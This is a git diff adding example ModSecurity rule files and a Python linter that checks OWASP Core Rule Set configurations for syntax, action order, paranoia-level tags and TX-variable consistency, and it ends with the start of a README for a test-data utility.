index 0000000000..bd54046b69 --- /dev/null +++ b/util/crs-rules-check/examples/test8.conf @@ -0,0 +1,56 @@ + +SecRule &TX:blocking_paranoia_level "@eq 0" \ + "id:901120,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.blocking_paranoia_level=1'" + +SecRule &TX:detection_paranoia_level "@eq 0" \ + "id:901125,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" + +SecRule &TX:error_anomaly_score "@eq 0" \ + "id:901141,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.error_anomaly_score=4'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920160,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920161,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920162,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" diff --git a/util/crs-rules-check/examples/test9.conf b/util/crs-rules-check/examples/test9.conf new file mode 100644 index 0000000000..d81d69fa51 --- /dev/null +++ b/util/crs-rules-check/examples/test9.conf @@ -0,0 +1,13 @@ + +SecRule TX:foo "@rx bar" \ + "id:1001,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx ^.*$" \ + "id:1002,\ + phase:1,\ + pass,\ + nolog,\ + setvar:tx.bar=1" diff --git a/util/crs-rules-check/requirements.txt b/util/crs-rules-check/requirements.txt new file mode 100644 index 0000000000..a989487670 --- /dev/null +++ b/util/crs-rules-check/requirements.txt @@ -0,0 +1 @@ +msc-pyparser>=1.2.1 diff --git a/util/crs-rules-check/rules-check.py b/util/crs-rules-check/rules-check.py new file mode 100755 index 0000000000..1a9f842fcb --- /dev/null +++ b/util/crs-rules-check/rules-check.py @@ -0,0 +1,945 @@ +#!/usr/bin/env python3 + +import sys +import os +import glob +import msc_pyparser +import difflib +import argparse +import re + +oformat = "native" + +class Check(object): + def __init__(self, data, txvars): + + # txvars is a global used hash table, but processing of rules is a sequential flow + # all rules need this global table + self.globtxvars = txvars + # list available operators, actions, transformations and ctl args + self.operators = "beginsWith|containsWord|contains|detectSQLi|detectXSS|endsWith|eq|fuzzyHash|geoLookup|ge|gsbLookup|gt|inspectFile|ipMatch|ipMatchF|ipMatchFromFile|le|lt|noMatch|pmFromFile|pmf|pm|rbl|rsub|rx|streq|strmatch|unconditionalMatch|validateByteRange|validateDTD|validateHash|validateSchema|validateUrlEncoding|validateUtf8Encoding|verifyCC|verifyCPF|verifySSN|within".split("|") + self.operatorsl = [o.lower() for o in self.operators] + self.actions = "accuracy|allow|append|auditlog|block|capture|chain|ctl|deny|deprecatevar|drop|exec|expirevar|id|initcol|logdata|log|maturity|msg|multiMatch|noauditlog|nolog|pass|pause|phase|prepend|proxy|redirect|rev|sanitiseArg|sanitiseMatched|sanitiseMatchedBytes|sanitiseRequestHeader|sanitiseResponseHeader|setenv|setrsc|setsid|setuid|setvar|severity|skipAfter|skip|status|tag|t|ver|xmlns".split("|") + self.actionsl = [a.lower() for a in self.actions] + self.transforms = "base64DecodeExt|base64Decode|base64Encode|cmdLine|compressWhitespace|cssDecode|escapeSeqDecode|hexDecode|hexEncode|htmlEntityDecode|jsDecode|length|lowercase|md5|none|normalisePathWin|normalisePath|normalizePathWin|normalizePath|parityEven7bit|parityOdd7bit|parityZero7bit|removeCommentsChar|removeComments|removeNulls|removeWhitespace|replaceComments|replaceNulls|sha1|sqlHexDecode|trimLeft|trimRight|trim|uppercase|urlDecodeUni|urlDecode|urlEncode|utf8toUnicode".split("|") + self.transformsl = [t.lower() for t in self.transforms] + self.ctls = "auditEngine|auditLogParts|debugLogLevel|forceRequestBodyVariable|hashEnforcement|hashEngine|requestBodyAccess|requestBodyLimit|requestBodyProcessor|responseBodyAccess|responseBodyLimit|ruleEngine|ruleRemoveById|ruleRemoveByMsg|ruleRemoveByTag|ruleRemoveTargetById|ruleRemoveTargetByMsg|ruleRemoveTargetByTag".split("|") + self.ctlsl = [c.lower() for c in self.ctls] + + # list the actions in expected order + # see wiki: https://github.com/SpiderLabs/owasp-modsecurity-crs/wiki/Order-of-ModSecurity-Actions-in-CRS-rules + # note, that these tokens are with lovercase here, but used only for to check the order + self.ordered_actions = [ + "id", # 0 + "phase", # 1 + "allow", + "block", + "deny", + "drop", + "pass", + "proxy", + "redirect", + "status", + "capture", # 10 + "t", + "log", + "nolog", + "auditlog", + "noauditlog", + "msg", + "logdata", + "tag", + "sanitisearg", + "sanitiserequestheader", # 20 + "sanitisematched", + "sanitisematchedbytes", + "ctl", + "ver", + "severity", + "multimatch", + "initcol", + "setenv", + "setvar", + "expirevar", # 30 + "chain", + "skip", + "skipafter", + ] + + self.data = data # holds the parsed data + self.current_ruleid = 0 # holds the rule id + self.curr_lineno = 0 # current line number + self.chained = False # holds the chained flag + self.caseerror = [] # list of case mismatch errors + self.orderacts = [] # list of ordered action errors + self.auditlogparts = [] # list of wrong ctl:auditLogParts + self.undef_txvars = [] # list of undefined TX variables + self.pltags = [] # list of incosistent PL tags + self.plscores = [] # list of incosistent PL scores + self.dupes = [] # list of duplicated id's + self.ids = {} # list of rule id's + self.newtags = [] # list of new, unlisted tags + + self.re_tx_var = re.compile("%\{\}") + + def store_error(self, msg): + # store the error msg in the list + self.caseerror.append({ + 'ruleid' : 0, + 'line' : self.curr_lineno, + 'endLine': self.curr_lineno, + 'message': msg + }) + + def check_ignore_case(self): + # check the ignore cases at operators, actions, + # transformations and ctl arguments + for d in self.data: + if "actions" in d: + aidx = 0 # index of action in list + if self.chained == False: + self.current_ruleid = 0 + else: + self.chained = False + + while aidx < len(d['actions']): + a = d['actions'][aidx] # 'a' is the action from the list + + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + if a['act_name'] == "chain": + self.chained = True + + # check the action is valid + if a['act_name'].lower() not in self.actionsl: + self.store_error("Invalid action", a['act_name']) + # check the action case sensitive format + if self.actions[self.actionsl.index(a['act_name'].lower())] != a['act_name']: + self.store_error("Action case mismatch: %s" % a['act_name']) + + if a['act_name'] == 'ctl': + # check the ctl argument is valid + if a['act_arg'].lower() not in self.ctlsl: + self.store_error("Invalid ctl", a['act_arg']) + # check the ctl argument case sensitive format + if self.ctls[self.ctlsl.index(a['act_arg'].lower())] != a['act_arg']: + self.store_error("Ctl case mismatch: %s" % a['act_arg']) + if a['act_name'] == 't': + # check the transform is valid + if a['act_arg'].lower() not in self.transformsl: + self.store_error("Invalid transform: %s" % a['act_arg']) + # check the transform case sensitive format + if self.transforms[self.transformsl.index(a['act_arg'].lower())] != a['act_arg']: + self.store_error("Transform case mismatch : %s" % a['act_arg']) + aidx += 1 + if "operator" in d and d["operator"] != "": + self.curr_lineno = d['oplineno'] + # strip the operator + op = d['operator'].replace("!", "").replace("@", "") + # check the operator is valid + if op.lower() not in self.operatorsl: + self.store_error("Invalid operator: %s" % d['operator']) + # check the operator case sensitive format + if self.operators[self.operatorsl.index(op.lower())] != op: + self.store_error("Operator case mismatch: %s" % d['operator']) + else: + if d['type'].lower() == "secrule": + self.curr_lineno = d['lineno'] + self.store_error("Empty operator isn't allowed") + if self.current_ruleid > 0: + for e in self.caseerror: + e['ruleid'] = self.current_ruleid + e['message'] += " (rule: %d)" % (self.current_ruleid) + + def check_action_order(self): + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + max_order = 0 # maximum position of read actions + if self.chained == False: + self.current_ruleid = 0 + else: + self.chained = False + + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + + # get the 'id' of rule + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + # check if chained + if a['act_name'] == "chain": + self.chained = True + + # get the index of action from the ordered list + # above from constructor + try: + act_idx = self.ordered_actions.index(a['act_name'].lower()) + except ValueError: + print("ERROR: '%s' not in actions list!" % (a['act_name'])) + sys.exit(-1) + + # if the index of current action is @ge than the previous + # max value, load it into max_order + if act_idx >= max_order: + max_order = act_idx + else: + # prevact is the previous action's position in list + # act_idx is the current action's position in list + # if the prev is @gt actually, means it's at wrong position + if self.ordered_actions.index(prevact) > act_idx: + self.orderacts.append({ + 'ruleid' : 0, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "action '%s' at pos %d is wrong place against '%s' at pos %d" % (prevact, pidx, a['act_name'], aidx,) + }) + prevact = a['act_name'].lower() + pidx = aidx + aidx += 1 + for a in self.orderacts: + if a['ruleid'] == 0: + a['ruleid'] = self.current_ruleid + a['message'] += " (rule: %d)" % (self.current_ruleid) + + def check_ctl_audit_log(self): + """check there is no ctl:auditLogParts action in any rules""" + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + + # get the 'id' of rule + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + # check if action is ctl:auditLogParts + if a['act_name'].lower() == "ctl" and a['act_arg'].lower() == "auditlogparts": + self.auditlogparts.append({ + 'ruleid' : self.current_ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "" + }) + + aidx += 1 + + def collect_tx_variable(self, fname): + """collect TX variables in rules + this function collects the TX variables at rules, + if the variable is at a 'setvar' action's left side, eg + setvar:tx.foo=bar + + Because this rule called before any other check, + additionally it checks the duplicated rule ID + """ + chained = False + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + if chained == False: + ruleid = 0 # ruleid + phase = 2 # works only in Apache, libmodsecurity uses default phase 1 + else: + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if ruleid in self.ids: + self.dupes.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "id %d is duplicated, previous place: %s:%d" % (ruleid, self.ids[ruleid]['fname'], self.ids[ruleid]['lineno']) + }) + else: + self.ids[ruleid] = {'fname': fname, 'lineno': a['lineno']} + if a['act_name'] == "phase": + phase = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] == "setvar": + if a['act_arg'][0:2].lower() == "tx": + txv = a['act_arg'][3:].split("=") + txv[0] = txv[0].lower() + # set TX variable if there is no such key + # OR + # key exists but the existing struct's phase is higher + if (txv[0] not in self.globtxvars or self.globtxvars[txv[0]]['phase'] > phase) and \ + not re.search("%\{[^%]+\}", txv[0]): + self.globtxvars[txv[0]] = { + 'phase' : phase, + 'used' : False, + 'file' : fname, + 'ruleid' : ruleid, + 'message': "", + 'line' : a['lineno'], + 'endLine': a['lineno'] + } + else: + pass + aidx += 1 + + def check_tx_variable(self, fname): + """this function checks if a used TX variable has set + + a variable is used when: + * it's an operator argument: "@rx %{TX.foo}" + * it's a target: SecRule TX.foo "@..." + * it's a right side value in a value giving: setvar:tx.bar=tx.foo + + this function collects the variables if it is used but not set previously + """ + check_exists = None # set if rule checks the existence of varm eg `&TX:foo "@eq 1"` + has_disruptive = False # set if rule contains disruptive action + chained = False + for d in self.data: + if d['type'].lower() in ["secrule", "secaction"]: + aidx = 0 # stores the index of current action + if chained == False: + phase = 2 # works only in Apache, libmodsecurity uses default phase 1 + ruleid = 0 + else: + chained = False + + # iterate over actions and collect these values: + # ruleid, phase, chained, rule has or not any disruptive action + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "phase": + phase = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] in ['block', 'deny', 'drop', 'allow', 'proxy', 'redirect']: + has_disruptive = True + + # check wheter tx.var is used at setvar's right side + val_act = [] + val_act_arg = [] + # example: + # setvar:'tx.inbound_anomaly_score_threshold=5' + # + # act_arg <- tx.inbound_anomaly_score_threshold + # act_atg_val <- 5 + # + # example2 (same as above, but no single quotes!): + # setvar:tx.inbound_anomaly_score_threshold=5 + # act_arg <- tx.inbound_anomaly_score_threshold + # act_atg_val <- 5 + # + if "act_arg" in a and a['act_arg'] is not None: + val_act = re.findall("%\{(tx.[^%]*)\}", a['act_arg'], re.I) + if "act_arg_val" in a and a['act_arg_val'] is not None: + val_act_arg = re.findall("%\{(tx.[^%]*)\}", a['act_arg_val'], re.I) + for v in val_act + val_act_arg: + v = v.lower().replace("tx.", "") + # check whether the variable is a captured var, eg TX.1 - we do not care that case + if not re.match("^\d$", v, re.I): + # v holds the tx.ANY variable, but not the captured ones + # we should collect these variables + if (v not in self.globtxvars or phase < self.globtxvars[v]['phase']): + self.undef_txvars.append({ + 'var' : v, + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "TX variable '%s' not set / later set (rvar) in rule %d" % (v, ruleid) + }) + else: + self.globtxvars[v]['used'] = True + else: + if v in self.globtxvars: + self.globtxvars[v]['used'] = True + aidx += 1 + + if "operator_argument" in d: + oparg = re.findall("%\{(tx.[^%]*)\}", d['operator_argument'], re.I) + if oparg: + for o in oparg: + o = o.lower() + o = re.sub("tx\.", "", o, re.I) + if (o not in self.globtxvars or phase < self.globtxvars[o]['phase']) and \ + not re.match("^\d$", o) and \ + not re.match("\/.*\/", o) and \ + check_exists is None: + self.undef_txvars.append({ + 'var' : o, + 'ruleid' : ruleid, + 'line' : d['lineno'], + 'endLine': d['lineno'], + 'message': "TX variable '%s' not set / later set (OPARG) in rule %d" % (o, ruleid) + }) + elif o in self.globtxvars and phase >= self.globtxvars[o]['phase'] and \ + not re.match("^\d$", o) and \ + not re.match("\/.*\/", o): + self.globtxvars[o]['used'] = True + if "variables" in d: + for v in d['variables']: + # check if the variable is TX and has not a & prefix, which counts + # the variable length + if v['variable'].lower() == "tx": + if v['counter'] != True: + # * if the variable part (after '.' or ':') is not there in + # the list of collected TX variables, and + # * not a numeric, eg TX:2, and + # * not a regular expression, between '/' chars, eg TX:/^foo/ + # OR + # * rule's phase lower than declaration's phase + rvar = v['variable_part'].lower() + if (rvar not in self.globtxvars or (ruleid != self.globtxvars[rvar]['ruleid'] and phase < self.globtxvars[rvar]['phase'])) and \ + not re.match("^\d$", rvar) and \ + not re.match("\/.*\/", rvar): + self.undef_txvars.append({ + 'var' : rvar, + 'ruleid' : ruleid, + 'line' : d['lineno'], + 'endLine': d['lineno'], + 'message': "TX variable '%s' not set / later set (VAR)" % (v['variable_part']) + }) + elif rvar in self.globtxvars and phase >= self.globtxvars[rvar]['phase'] and \ + not re.match("^\d$", rvar) and \ + not re.match("\/.*\/", rvar): + self.globtxvars[rvar]['used'] = True + else: + check_exists = True + self.globtxvars[v['variable_part'].lower()] = { + 'var' : v['variable_part'].lower(), + 'phase' : phase, + 'used' : False, + 'file' : fname, + 'ruleid' : ruleid, + 'message': "", + 'line' : d['lineno'], + 'endLine': d['lineno'] + } + if has_disruptive == True: + self.globtxvars[v['variable_part'].lower()]['used'] = True + if len(self.undef_txvars) > 0 and self.undef_txvars[-1]['var'] == v['variable_part'].lower(): + del(self.undef_txvars[-1]) + if chained == False: + check_exists = None + has_disruptive = False + + def check_pl_consistency(self): + """this method checks the PL consistency + + the function iterates through the rules, and catches the set PL, eg: + + SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" ... + this means we are on PL1 currently + + all rules must consist with current PL at the used tags and variables + + eg: + tag:'paranoia-level/1' + ^ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + ^^^ + additional relations: + * all rules must have the "tag:'paranoia-level/N'" if it does not have "nolog" action + * if rule have "nolog" action it must not have "tag:'paranoia-level/N'" action + * anomaly scoring value on current PL must increment by value corresponding to severity + + """ + curr_pl = 0 + tags = [] # collect tags + _txvars = {} # collect setvars and values + _txvlines = {} # collect setvars and its lines + severity = None # severity + has_nolog = False # nolog action exists + + for d in self.data: + # find the current PL + if d['type'].lower() in ["secrule"]: + for v in d['variables']: + if v['variable'].lower() == "tx" and \ + v['variable_part'].lower() == "detection_paranoia_level" and \ + d['operator'] == "@lt" and re.match("^\d$", d['operator_argument']): + curr_pl = int(d['operator_argument']) + + if "actions" in d: + aidx = 0 # stores the index of current action + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "severity": + severity = a['act_arg'].replace("'", "").lower() + if a['act_name'] == "tag": + tags.append(a) + if a['act_name'] == "setvar": + if a['act_arg'][0:2].lower() == "tx": + # this hack necessary, because sometimes we use setvar argument + # between '', sometimes not + # eg + # setvar:crs_setup_version=334 + # setvar:'tx.inbound_anomaly_score_threshold=5' + txv = a['act_arg'][3:].split("=") + txv[0] = txv[0].lower() # variable name + if len(txv) > 1: + txv[1] = txv[1].lower().strip("+\{\}") # variable value + else: + txv.append(a['act_arg_val'].strip("+\{\}")) + _txvars[txv[0]] = txv[1] + _txvlines[txv[0]] = a['lineno'] + if a['act_name'] == "nolog": + has_nolog = True + if a['act_name'] == "chain": + chained = True + aidx += 1 + + has_pl_tag = False + for a in tags: + if a['act_arg'][0:14] == "paranoia-level": + has_pl_tag = True + pltag = int(a['act_arg'].split("/")[1]) + if has_nolog: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "tag '%s' with 'nolog' action, rule id: %d" % (a['act_arg'], ruleid) + }) + elif pltag != curr_pl and curr_pl > 0: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "tag '%s' on PL %d, rule id: %d" % (a['act_arg'], curr_pl, ruleid) + }) + + if has_pl_tag != True and has_nolog == False and curr_pl >= 1: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "rule does not have `paranoia-level/%d` action, rule id: %d" % (curr_pl, ruleid) + }) + + for t in _txvars: + subst_val = re.search("%{tx.[a-z]+_anomaly_score}", _txvars[t], re.I) + val = re.sub("[\+\%\{\}]", "", _txvars[t]).lower() + scorepl = re.search("anomaly_score_pl\d$", t) # check if last char is a numeric, eg ...anomaly_score_pl1 + if scorepl: + if curr_pl > 0 and int(t[-1]) != curr_pl: + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "variable %s on PL %d, rule id: %d" % (t, curr_pl, ruleid) + }) + if severity is None and subst_val: # - do we need this? + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "missing severity action, rule id: %d" % (ruleid) + }) + else: + if val != 'tx.%s_anomaly_score' % (severity) and val != "0": + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "invalid value for anomaly_score_pl%d: %s with severity %s, rule id: %d" % (int(t[-1]), val, severity, ruleid) + }) + # variable has found so we need to mark it as used + self.globtxvars[t]['used'] = True + + # reset local variables if we are done with a rule <==> no more 'chain' action + if chained == False: + tags = [] # collect tags + _txvars = {} # collect setvars and values + _txvlines = {} # collect setvars and its lines + severity = None # severity + has_nolog = False # rule has nolog action + + def check_tags(self, fname, tagslist): + """ + check that only tags from the util/APPROVED_TAGS file are used + """ + chained = False + ruleid = 0 + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + if chained == False: + ruleid = 0 + else: + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] == "tag": + # check wheter tag is in tagslist + if tagslist.count(a['act_arg']) == 0: + self.newtags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "rule uses unknown tag: '%s'; only tags registered in the util/APPROVED_TAGS file may be used; rule id: %d" % (a['act_arg'], ruleid) + }) + aidx += 1 + + +def remove_comments(data): + """ + In some special cases, remove the comments from the beginning of the lines. + + A special case starts when the line has a "SecRule" or "SecAction" token at + the beginning and ends when the line - with or without a comment - is empty. + + Eg.: + 175 # Uncomment this rule to change the default: + 176 # + 177 #SecAction \ + 178 # "id:900000,\ + 179 # phase:1,\ + 180 # pass,\ + 181 # t:none,\ + 182 # nolog,\ + 183 # setvar:tx.blocking_paranoia_level=1" + 184 + 185 + 186 # It is possible to execute rules from a higher paranoia level but not include + + In this case, the comments from the beginning of lines 177 and 183 are deleted and + evaluated as follows: + + 175 # Uncomment this rule to change the default: + 176 # + 177 SecAction \ + 178 "id:900000,\ + 179 phase:1,\ + 180 pass,\ + 181 t:none,\ + 182 nolog,\ + 183 setvar:tx.blocking_paranoia_level=1" + 184 + 185 + 186 # It is possible to execute rules from a higher paranoia level but not include + + """ + _data = [] # new structure by lines + lines = data.split("\n") + marks = re.compile("^#(| *)(SecRule|SecAction)", re.I) # regex what catches the rules + state = 0 # hold the state of the parser + for l in lines: + # if the line starts with #SecRule, #SecAction, # SecRule, # SecAction, set the marker + if marks.match(l): + state = 1 + # if the marker is set and the line is empty or contains only a comment, unset it + if state == 1 and l.strip() in ["", "#"]: + state = 0 + + # if marker is set, remove the comment + if state == 1: + _data.append(re.sub("^#", "", l)) + else: + _data.append(l) + + data = "\n".join(_data) + + return data + +def errmsg(msg): + if oformat == "github": + print("::error %s" % (msg)) + else: + print(msg) + +def errmsgf(msg): + if oformat == "github": + if 'message' in msg and msg['message'].strip() != "": + print("::error%sfile={file},line={line},endLine={endLine},title={title}: {message}".format(**msg) % (msg['indent']*" ")) + else: + print("::error%sfile={file},line={line},endLine={endLine},title={title}".format(**msg) % (msg['indent']*" ")) + else: + if 'message' in msg and msg['message'].strip() != "": + print("%sfile={file}, line={line}, endLine={endLine}, title={title}: {message}".format(**msg) % (msg['indent']*" ")) + else: + print("%sfile={file}, line={line}, endLine={endLine}, title={title}".format(**msg) % (msg['indent']*" ")) + +def msg(msg): + if oformat == "github": + print("::debug %s" % (msg)) + else: + print(msg) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="CRS Rules Check tool") + parser.add_argument("-o", "--output", dest="output", help="Output format native[default]|github", required=False) + parser.add_argument("-r", "--rules", metavar='/path/to/coreruleset/*.conf', type=str, + nargs='*', help='Directory path to CRS rules', required=True, + action="append") + parser.add_argument("-t", "--tags-list", dest="tagslist", help="Path to file with permitted tags", required=True) + args = parser.parse_args() + + crspath = [] + for l in args.rules: + crspath += l + + if args.output is not None: + if args.output not in ["native", "github"]: + print("--output can be one of the 'native' or 'github'. Default value is 'native'") + sys.exit(1) + oformat = args.output + + tags = [] + try: + with open(args.tagslist, "r") as fp: + tags = [l.strip() for l in fp.readlines()] + # remove empty items, if any + tags = list(filter(lambda x: len(x) > 0, tags)) + except: + errmsg("Can't open tags list: %s" % args.tagslist) + sys.exit(1) + + retval = 0 + try: + flist = crspath + flist.sort() + except: + errmsg("Can't open files in given path!") + sys.exit(1) + + if len(flist) == 0: + errmsg("List of files is empty!") + sys.exit(1) + + parsed_structs = {} + txvars = {} + + for f in flist: + try: + with open(f, 'r') as inputfile: + data = inputfile.read() + # modify the content of the file, if it is the "crs-setup.conf.example" + if f.startswith("crs-setup.conf.example"): + data = remove_comments(data) + except: + errmsg("Can't open file: %s" % f) + sys.exit(1) + + ### check file syntax + msg("Config file: %s" % (f)) + try: + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + msg(" Parsing ok.") + parsed_structs[f] = mparser.configlines + except Exception as e: + err = e.args[1] + if err['cause'] == "lexer": + cause = "Lexer" + else: + cause = "Parser" + errmsg("Can't parse config file: %s" % (f)) + errmsgf({ + 'indent' : 2, + 'file' : f, + 'title' : "%s error" % (cause), + 'line' : err['line'], + 'endLine': err['line'], + 'message': "can't parse file"}) + retval = 1 + continue + + msg("Checking parsed rules...") + for f in parsed_structs.keys(): + + msg(f) + c = Check(parsed_structs[f], txvars) + + ### check case usings + c.check_ignore_case() + if len(c.caseerror) == 0: + msg(" Ignore case check ok.") + else: + errmsg(" Ignore case check found error(s)") + for a in c.caseerror: + a['indent'] = 2 + a['file'] = f + a['title'] = "Case check" + errmsgf(a) + retval = 1 + + ### check action's order + c.check_action_order() + if len(c.orderacts) == 0: + msg(" Action order check ok.") + else: + errmsg(" Action order check found error(s)") + for a in c.orderacts: + a['indent'] = 2 + a['file'] = f + a['title'] = 'Action order check' + errmsgf(a) + retval = 1 + + ### make a diff to check the indentations + try: + with open(f, 'r') as fp: + fromlines = fp.readlines() + if f.startswith("crs-setup.conf.example"): + fromlines = remove_comments("".join(fromlines)).split("\n") + fromlines = [l + "\n" for l in fromlines] + except: + errmsg(" Can't open file for indent check: %s" % (f)) + retval = 1 + # virtual output + mwriter = msc_pyparser.MSCWriter(parsed_structs[f]) + mwriter.generate() + #mwriter.output.append("") + output = [] + for l in mwriter.output: + if l == "\n": + output.append("\n") + else: + output += [l + "\n" for l in l.split("\n")] + + if len(fromlines) < len(output): + fromlines.append("\n") + elif len(fromlines) > len(output): + output.append("\n") + + diff = difflib.unified_diff(fromlines, output) + if fromlines == output: + msg(" Indentation check ok.") + else: + errmsg(" Indentation check found error(s)") + retval = 1 + for d in diff: + d = d.strip("\n") + r = re.match("^@@ -(\d+),(\d+) \+\d+,\d+ @@$", d) + if r: + line1, line2 = [int(i) for i in r.groups()] + e = { + 'indent' : 2, + 'file' : f, + 'title' : "Indentation error", + 'line' : line1, + 'endLine': line1+line2, + 'message': "an indentation error has found" + } + errmsgf(e) + errmsg(d.strip("\n")) + + ### check `ctl:auditLogParts=+E` right place in chained rules + c.check_ctl_audit_log() + if len(c.auditlogparts) == 0: + msg(" no 'ctl:auditLogParts' action found.") + else: + errmsg(" Found 'ctl:auditLogParts' action") + for a in c.auditlogparts: + a['indent'] = 2 + a['file'] = f + a['title'] = "'ctl:auditLogParts' isn't allowed in CRS" + errmsgf(a) + retval = 1 + + ### collect TX variables + # this method collects the TX variables, which set via a + # `setvar` action anywhere + # this method does not check any mandatory clause + c.collect_tx_variable(f) + + ### check duplicate ID's + # c.dupes filled during the tx variable collected + if len(c.dupes) == 0: + msg(" no duplicate id's") + else: + errmsg(" Found duplicated id('s)") + for a in c.dupes: + a['indent'] = 2 + a['file'] = f + a['title'] = "'id' is duplicated" + errmsgf(a) + retval = 1 + + ### check PL consistency + c.check_pl_consistency() + if len(c.pltags) == 0: + msg(" paranoia-level tags are correct.") + else: + errmsg(" Found incorrect paranoia-level/N tag(s)") + for a in c.pltags: + a['indent'] = 2 + a['file'] = f + a['title'] = "wrong or missing paranoia-level/N tag" + errmsgf(a) + retval = 1 + if len(c.plscores) == 0: + msg(" PL anomaly_scores are correct.") + else: + errmsg(" Found incorrect (inbound|outbout)_anomaly_score value(s)") + for a in c.plscores: + a['indent'] = 2 + a['file'] = f + a['title'] = "wrong (inbound|outbout)_anomaly_score variable or value" + errmsgf(a) + retval = 1 + + ### check existence of used TX variables + c.check_tx_variable(f) + if len(c.undef_txvars) == 0: + msg(" All TX variables are set.") + else: + errmsg(" There are one or more unset TX variables.") + for a in c.undef_txvars: + a['indent'] = 2 + a['file'] = f + a['title'] = "unset TX variable" + errmsgf(a) + retval = 1 + ### check new unlisted tags + c.check_tags(f, tags) + if len(c.newtags) == 0: + msg(" No new tags added.") + else: + errmsg(" There are one or more new tag(s).") + for a in c.newtags: + a['indent'] = 2 + a['file'] = f + a['title'] = "new unlisted tag" + errmsgf(a) + retval = 1 + msg("End of checking parsed rules") + msg("Cumulated report about unused TX variables") + has_unused = False + for tk in txvars: + if txvars[tk]['used'] == False: + if has_unused == False: + msg(" Unused TX variable(s):") + a = txvars[tk] + a['indent'] = 2 + a['title'] = "unused TX variable" + a['message'] = "unused variable: %s" % (tk) + errmsgf(a) + retval = 1 + has_unused = True + + if has_unused == False: + msg(" No unused TX variable") + + sys.exit(retval) diff --git a/util/find-max-datalen-in-tests/README.md b/util/find-max-datalen-in-tests/README.md new file mode 100644 index 0000000000..8f2dcd8b31 --- /dev/null +++ b/util/find-max-datalen-in-tests/README.md @@ -0,0 +1,47 @@ +# Find the longest data in CRS test cases + +This page describes how can you find the longest data string in CRS test cases. + +## Goals + +Some rules check the `FILES_COMBINED_SIZE` against the `TX:COMBINED_FILE_SIZES` variable. To check these work as well, we need to set the `tx.combined_file_sizes` variable and send a payload which is greater than this value - see [this](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/tests/regression/README.md#requirements): + +``` +SecAction "id:900005,\ + phase:1,\ + nolog,\ + pass,\ + ctl:ruleEngine=DetectionOnly,\ + ctl:ruleRemoveById=910000,\ + setvar:tx.blocking_paranoia_level=4,\ + 